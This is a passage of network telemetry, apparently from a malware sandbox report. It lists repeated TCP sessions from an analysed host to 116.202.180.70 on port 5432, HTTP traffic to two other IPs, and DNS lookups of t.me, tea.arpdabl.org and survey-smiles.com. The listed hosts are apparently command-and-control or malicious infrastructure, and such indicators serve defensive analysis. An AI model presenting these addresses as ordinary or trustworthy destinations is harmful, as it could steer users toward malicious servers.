                                                              Jul 3, 2024 02:22:38.093835115 CEST491765432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.098583937 CEST543249176116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:38.731553078 CEST543249176116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:38.731698036 CEST491765432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.732747078 CEST491765432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.735009909 CEST491765432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.736018896 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.737721920 CEST543249176116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:38.740385056 CEST543249176116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:38.740447998 CEST491765432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.740823030 CEST543249177116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:38.740894079 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.741244078 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:38.746088982 CEST543249177116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:39.386612892 CEST543249177116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:39.386840105 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.390234947 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.395025969 CEST543249177116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:39.400660038 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.403076887 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.405857086 CEST543249177116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:39.405922890 CEST491775432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.407922983 CEST543249178116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:39.408123016 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.408529043 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:39.413331032 CEST543249178116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:40.037471056 CEST543249178116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:40.037570000 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:40.038585901 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:40.040832996 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:40.043348074 CEST543249178116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:40.045928001 CEST543249178116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:40.045989037 CEST491785432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:42.618094921 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:42.623059988 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:42.623136044 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:42.623653889 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:42.628528118 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.269190073 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.269249916 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.269915104 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.271363020 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.274688005 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.276150942 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.925755024 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.925815105 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.925822973 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.925859928 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.927134037 CEST491725432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.927438021 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.935321093 CEST543249172116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.935396910 CEST491725432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.936018944 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:43.936178923 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.936624050 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:43.944210052 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:44.591840029 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:44.591906071 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:44.600245953 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:44.602767944 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:44.607356071 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:44.609914064 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.281349897 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.281426907 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.282258987 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.282767057 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.287383080 CEST543249179116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.287430048 CEST491795432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.287547112 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.287600994 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.287880898 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.292702913 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.944356918 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.944416046 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.959363937 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.960953951 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:45.964227915 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:45.967422962 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:46.640134096 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:46.640152931 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:46.640214920 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.657139063 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.657459974 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.662245035 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:46.662326097 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.662446022 CEST543249180116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:46.662494898 CEST491805432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.662573099 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:46.667362928 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:47.312457085 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:47.312541962 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:47.313416958 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:47.315213919 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:47.321171999 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:47.324001074 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:47.953140020 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:47.953265905 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.705329895 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.705686092 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.711843967 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:48.711911917 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.712184906 CEST543249181116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:48.712219000 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.712234974 CEST491815432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:48.718528986 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.352168083 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.352232933 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.353116989 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.354592085 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.354774952 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.357930899 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.359709024 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.359718084 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.359778881 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.364651918 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.364660978 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.364672899 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.364722967 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.364746094 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.369613886 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369649887 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369658947 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369668007 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.369697094 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.369832993 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369879007 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.369913101 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369930983 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.369971037 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.369971037 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.374758005 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.374767065 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.374775887 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.374789953 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.374836922 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.374836922 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.375555038 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.375607014 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.376101017 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.376159906 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.376672983 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.376727104 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.379662037 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.379683971 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.379714966 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.379729986 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.379736900 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.379798889 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.379847050 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.379897118 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.380495071 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.380544901 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.380578041 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.380630016 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.381058931 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.381110907 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.382630110 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.382668972 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.382683992 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.382714987 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.382874966 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391385078 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391462088 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391505003 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391541004 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391549110 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391556025 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391563892 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391570091 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391581059 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391601086 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391612053 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391623020 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.391629934 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.391675949 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:49.392299891 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.392337084 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.392344952 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.392359018 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.392366886 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399590969 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399600029 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399609089 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399641991 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399650097 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399657965 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399666071 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399673939 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399682045 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399691105 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399698973 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399708033 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399715900 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399724007 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399732113 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399739981 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399748087 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399756908 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399765015 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399774075 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399780989 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399790049 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399797916 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399801016 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399811029 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399821043 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399832010 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399840117 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399848938 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399857998 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399866104 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399873972 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399882078 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399890900 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399899006 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399908066 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399915934 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399924994 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399933100 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399946928 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399955988 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399964094 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399972916 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399981022 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399990082 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.399997950 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400006056 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400013924 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400022984 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400032043 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400043964 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:49.400052071 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:50.622863054 CEST543249183116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:50.622934103 CEST491835432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.764158010 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.764487028 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.769525051 CEST543249182116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:50.769596100 CEST491825432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.769726992 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:50.769785881 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.770086050 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:50.774939060 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:51.483941078 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:51.484049082 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:51.484761953 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:51.486223936 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:51.489561081 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:51.491183996 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:52.148675919 CEST543249184116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:52.148745060 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:52.182087898 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.186954975 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.187020063 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.187213898 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.187232018 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.192065001 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.192074060 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.192145109 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.199098110 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.199107885 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.199210882 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.823086023 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.823144913 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.823638916 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:52.823684931 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:52.827128887 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.127795935 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.736201048 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.867820978 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.867918015 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.867928982 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.867980003 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.868264914 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.868309975 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.871139050 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.871151924 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.871159077 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.871169090 CEST8049185185.107.56.202192.168.2.22
                                                              Jul 3, 2024 02:22:53.871294975 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.871294975 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.871294975 CEST4918580192.168.2.22185.107.56.202
                                                              Jul 3, 2024 02:22:53.872170925 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:53.877033949 CEST8049186199.59.243.226192.168.2.22
                                                              Jul 3, 2024 02:22:53.877101898 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:53.877269030 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:53.882056952 CEST8049186199.59.243.226192.168.2.22
                                                              Jul 3, 2024 02:22:54.343182087 CEST8049186199.59.243.226192.168.2.22
                                                              Jul 3, 2024 02:22:54.343245983 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:54.343272924 CEST8049186199.59.243.226192.168.2.22
                                                              Jul 3, 2024 02:22:54.343312979 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:56.245804071 CEST4918680192.168.2.22199.59.243.226
                                                              Jul 3, 2024 02:22:56.246126890 CEST491845432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:56.246747971 CEST491835432192.168.2.22116.202.180.70
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jul 3, 2024 02:22:19.342617035 CEST5456253192.168.2.228.8.8.8
                                                              Jul 3, 2024 02:22:19.382070065 CEST53545628.8.8.8192.168.2.22
                                                              Jul 3, 2024 02:22:52.160032988 CEST5789353192.168.2.228.8.8.8
                                                              Jul 3, 2024 02:22:52.181680918 CEST53578938.8.8.8192.168.2.22
                                                              Jul 3, 2024 02:22:52.829047918 CEST5482153192.168.2.228.8.8.8
                                                              Jul 3, 2024 02:22:53.829914093 CEST5482153192.168.2.228.8.8.8
                                                              Jul 3, 2024 02:22:53.871582031 CEST53548218.8.8.8192.168.2.22
                                                              Jul 3, 2024 02:22:53.871592045 CEST53548218.8.8.8192.168.2.22
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jul 3, 2024 02:22:19.342617035 CEST192.168.2.228.8.8.80x2845Standard query (0)t.meA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:52.160032988 CEST192.168.2.228.8.8.80x7a5dStandard query (0)tea.arpdabl.orgA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:52.829047918 CEST192.168.2.228.8.8.80xd165Standard query (0)survey-smiles.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:53.829914093 CEST192.168.2.228.8.8.80xd165Standard query (0)survey-smiles.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jul 3, 2024 02:22:19.382070065 CEST8.8.8.8192.168.2.220x2845No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.23A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.36A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.35A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.35A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.34A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.38A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.489028931 CEST8.8.8.8192.168.2.220xb237No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.37A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.503882885 CEST8.8.8.8192.168.2.220xb7f4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:21.503882885 CEST8.8.8.8192.168.2.220xb7f4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
